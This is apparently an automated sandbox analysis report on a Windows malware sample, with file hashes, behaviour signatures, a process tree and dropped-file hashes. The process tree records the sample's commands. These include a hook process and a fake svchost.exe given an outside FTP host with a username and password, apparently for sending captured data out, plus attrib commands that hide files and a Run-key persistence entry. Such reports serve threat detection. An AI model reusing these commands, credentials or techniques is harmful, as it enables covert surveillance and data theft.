Analysis
-
max time kernel
119s -
max time network
123s -
platform
windows7_x64 -
resource
win7-20240221-en -
resource tags
-
submitted
10/04/2024, 08:05
General
-
Target
ffa189b71fccbb29a74a29acb39a0dfe0892f3770fec785d9d82e55bb60addf0.exe
-
Size
610KB
-
MD5
8a65479b077295d8420430e9f114b6a2
-
SHA1
887a5cd20db8752b6d55f1a7c8ca2f870cc75bd8
-
SHA256
ffa189b71fccbb29a74a29acb39a0dfe0892f3770fec785d9d82e55bb60addf0
-
SHA512
668dbdf1c392b6a59642098d3c2f8d658470f0f760efd59689522b7a6a1537912805fb95889de88c0c8ee0d4cc16858e9e01b1a0a8e552204c4cfd3f852cb12f
-
SSDEEP
12288:UjAYTQEg3QC0DSCVA0b5fCLaZaO7ruzaxrTo:Usv3Q5D15/N7Kza/o
Malware Config
Signatures
-
Sets file to hidden 1 TTPs 2 IoCs
Modifies file attributes to stop it showing in Explorer etc.
-
Executes dropped EXE 8 IoCs
-
Loads dropped DLL 10 IoCs
-
UPX packed file 4 IoCs
Detects executables packed with UPX/modified UPX open source packer.
-
Adds Run key to start application 2 TTPs 1 IoCs
-
Drops file in System32 directory 1 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Gathers network information 2 TTPs 1 IoCs
Uses commandline utility to view network configuration.
-
Modifies data under HKEY_USERS 18 IoCs
-
Runs net.exe
-
Suspicious use of SetWindowsHookEx 1 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
-
Views/modifies file attributes 1 TTPs 2 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\ffa189b71fccbb29a74a29acb39a0dfe0892f3770fec785d9d82e55bb60addf0.exe"C:\Users\Admin\AppData\Local\Temp\ffa189b71fccbb29a74a29acb39a0dfe0892f3770fec785d9d82e55bb60addf0.exe"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\TEMP\test.vbs"2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\TEMP\START.BAT" "3⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
\??\c:\TEMP\lsasaa.exec:\TEMP\lsasaa.exe /U4⤵
- Executes dropped EXE
-
-
\??\c:\TEMP\lsasaa.exec:\TEMP\lsasaa.exe /I4⤵
- Executes dropped EXE
-
-
C:\Windows\SysWOW64\net.exenet start backup4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start backup5⤵
-
-
-
\??\c:\TEMP\abc.exec:\TEMP\abc.exe4⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\TEMP\run.bat" "5⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
\??\c:\TEMP\runner.exec:\TEMP\runner.exe6⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\5532.tmp\runner.bat""7⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
\??\c:\TEMP\encftpinfo.exeencftpinfo.exe "-s:matrixnotloaded.com -u:[email protected] -p:pakistan12345"8⤵
- Executes dropped EXE
-
-
\??\c:\TEMP\HookRunner.exeHookRunner.exe svchost.exe8⤵
- Executes dropped EXE
- Loads dropped DLL
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
-
\??\c:\TEMP\svchost.exesvchost.exe -s:matrixnotloaded.com -u:[email protected] -p:pakistan123459⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetWindowsHookEx
-
-
-
C:\Windows\SysWOW64\attrib.exeattrib +s +h c:\windows\t$emp218⤵
- Sets file to hidden
- Views/modifies file attributes
-
-
-
-
-
-
C:\Windows\SysWOW64\ipconfig.exeipconfig /all4⤵
- Loads dropped DLL
- Gathers network information
-
-
C:\Windows\SysWOW64\attrib.exeattrib C:\TEMP +s +h4⤵
- Sets file to hidden
- Views/modifies file attributes
-
-
-
-
\??\c:\TEMP\lsasaa.exec:\TEMP\lsasaa.exe1⤵
- Executes dropped EXE
- Drops file in System32 directory
- Modifies data under HKEY_USERS
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
149KB
MD592213388e2da136a0c780a0730c30a5e
SHA1b7f60ef085fbd78662e80e9e4c2a97f60937bee9
SHA256772987f4d718620d8b4b1fc227ef9bc331b823d37834781250d2460293449b31
SHA512a7745b6b7bccbeb08f3a717aa51440c64aef480bcba49b2df83b8fff6b33f502f14fd3537761fdb7c6b3685a7b301b5eaf98409aa70c2673e933669406b9c51c
-
Filesize
158B
MD58cbd05a78b26dc955223125b5cea66ad
SHA1e50c5530ef5769b3ea694fd0c7ecf5159f8617c4
SHA256f2b973f08276a3035ed4bfe10eb50b165eaf262c9031b7f96e815d0d3e2f8eff
SHA512f59c7de07f88abc2def810ac78ac63bca76fe8ff14c48f9de58c10fbdf8617c6c143c2057a50ef738f6fdea6f44a8b3f3b63328cf2d301b7e9d6852c72255f89
-
Filesize
42B
MD50948c7444ff919ec7218ad04c29c8189
SHA1c51483f3ebfff55a0cf6b12ca14bf14a34de9965
SHA256113cc50ddac3f98b7e5933d824b31f394e75d3432d1a94638f31df328a6fa306
SHA5128dbd7bf859625676c303cc188cb1401b15fab6d9efb39cad7a86497948a916ff7f1fbcca0faa2f175f669caa148bc877f03bedd8617528024ab66b7a02d9c782
-
Filesize
122B
MD585718c45f125fa4822c925ecc06898d8
SHA1ef0a85c283ee16c47b4e83845da680ae0fdc8e68
SHA256e5fb95068efbb0ab31410f12ed4988ab7721b1db75595695e063d3176d0ce000
SHA512908345cf4071696187cecac559b2bd3586b5782f2bd36cf786d6a9fe53818138699c9cf117117872345a23ebb095baa657f2bc0df4e6eebb960104e53eaaf187
-
Filesize
172B
MD5260a3a351fd97f66d57f23bef474ac5d
SHA1114e25048d24b82867c027853f4a2e3871aa8a6b
SHA25688b40fd59aa072f8e49ec39996f528662a3bb8cf7ab1b171a0120bb89295a844
SHA512df0f2eb13f36d92e0d928c55c6508fec5fe4bb4b145879486ff845862f651e4d941749c62fe9ae3b7afeacee03223fdc4f802eda32fe869e5143b57144497452
-
Filesize
616B
MD59592eb4843a3c3d4918f479166085484
SHA11d8a5fe5a4785fffbe0cb4223c783f2057d32e49
SHA25603d3c263fb4bec8d2ce51fd26d61805c4c1151696b7e3a702de7854b2a3e0a61
SHA512d35fb5038da5f8d6983cec6b2a1b296667f8c26756b077aff8323fed0db9d193814fbc0491f0a16624123722c7c728046512a29c2e12d03d589468a58c6e6656
-
Filesize
68B
MD591c1177587e3ff5d13957537df4e0a62
SHA10b160004e39bf992a376dcbbc54a07a21cc43963
SHA256ee6fa7a065ff2867bf2404f34ea898ff90ef5e84ef87531ff947518dfa7ffa50
SHA512400e0842b7ca1168c0d4025667444eef1e466d82a63de77185d1b1b0faf66b797f321fd881b5eb676ff071022f5b1c600381ae0901615089c42e4400b2ab0e99
-
Filesize
22KB
MD5174c21aeba48bfa07abd43181a716006
SHA14d42af77e496bd1325a5757bc8d817cc0d2ccf55
SHA256e6f73f091d162ae5f7ec6f26052402acd9f85de216ad8efb3f128441e17f836a
SHA512140466165a8c056102d7cbcbab0f2e3542732682fea9bdbea1b187a97598720b1dcbb4ccf6767954403699a277c1193eb4218063a4b88422d0cf038c5aef4967
-
Filesize
78KB
MD5c8778ad216f2d398d31b3b31e847b0ed
SHA1db1a696126e59ba2e8571651accd014139716ba8
SHA256f5e1b6975a087b0660294d92cd2b57370d0a4d72e69a282dd322a4ed07155267
SHA5123c97cbbd0c21ed0e5bb562e1d907f3a5a1b15917e9bc4d02d010025ee927e175d8b7be2a0facbecc8bb5d280e82724e0f3538bf6a5f3755de87306c0d7a94e63
-
Filesize
388KB
MD521609c45130fbba1a8c07b6fe864bbc4
SHA1b276de9ea78ca112d07f607eaa52888ae5a48450
SHA256da99f6d04bf93f24168ce608b9df9a869f73fc2938928deecf5fbeb36ce8ed55
SHA512b78dd0a13daa7366b6c07179076f93009be4ccc595a27ab0979d93a04786283eff07bd380758e1d4447ce316ccc49a9a4678488b0650bf2683d7e3be54ba1107
-
Filesize
146KB
MD5d3086b27aeaebf181c0c3efe2e65415b
SHA12f53e2dcfaed4879b55f815a8c54f0a6bda7b91d
SHA2562e35b169c5fcb207d77c84f7cc2cd304471e0dedd501f5e29b521457c2e7dd8d
SHA5127c9a67cbae892584f03ee5464982e2dae5ab6e40bebc591073d776df901d39956291b9deace31954501e1e906caca58b87f0e23786c4a970d470c9ec9536605e
-
Filesize
375KB
MD5c6e5a5f46ee463c3d3c823e049edd213
SHA126426d26fdcf9de4fe2b68b2271bf09ce76dd64d
SHA256119af76cc714d9968d748547541eedd347ce3001b1553d06fcecb52a9f436d7c
SHA5124d17c207d0286a5db4399c5cf3d16794737a390e25e07237c7696ad9b20847a5828ad8581a044aa6c8e8e1ac0390572bc957d078b8488b936caa38361237d603
-
Filesize
174KB
MD5bdcfa18d34413c97db21d434f25ceae7
SHA1a33676dbceb1b6f030d6df6ea02dfb9ce594ad4f
SHA25661ce209ad354ec5465957c7a4be696b49a465472db58d17b1c9a406fe19d9043
SHA512f3d389dd3639c27a847b889044b72fa7b03f7fb04440dc5be77b3f7eb884011f05766546053bfd7785da907a981e62b46a02b885a84baa179ed739c660955b22
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
156KB
-
Filesize
156KB
-
Filesize
64KB
-
Filesize
64KB